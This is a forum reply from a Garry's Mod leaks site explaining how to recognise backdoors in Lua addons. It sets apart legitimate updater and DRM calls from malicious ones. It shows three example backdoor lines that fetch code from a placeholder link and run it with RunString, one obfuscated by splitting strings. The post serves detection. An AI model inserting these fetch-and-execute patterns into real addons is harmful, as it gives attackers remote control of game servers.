Garry's Mod Leaks

[Info] What are backdoors, how do they work, how do you find them, how to stop them

Submitted by Poggers kekw, , Thread ID: 260436

RE: [Info] What are backdoors, how do they work, how do you find them, how to stop them

OP
This post was last modified: 05-03-2023, 05:24 PM by Poggers kekw
#5
05-03-2023, 04:41 PM
Celaz Wrote:
Is http. format is always a backdoor?
not always, sometimes it can be an updater or DRM. but there's a really high chance it's a backdoor.
most http backdoors will look like:
Code:
http.Fetch("bad link",function(b) RunString(b,":",false) end)

or

http.Fetch("bad link",RunString)

or

_G["ht".."tp"]["Fe".."tch"]("encry".."pted b".."ad li".."nk",function(b) _G["Run".."String"](b) end)
updaters should look like:
Code:
local file_version = "1"
http.Fetch("update url",function(current_version)
      if current_version != file_version then
             print("outdated")
      end
end)
drms will look like:
Code:
http.Post("drm url",{ key = "licensekey", owner = "7642867276230", addon ="hi ertrw"}, function(content)
      if content == "leaked" then
             print("blocked")
      else
                load(files)
        end
end)

Lost Programmer
My messages are open, ask me anything!
My Github


Users browsing this thread: 3 Guest(s)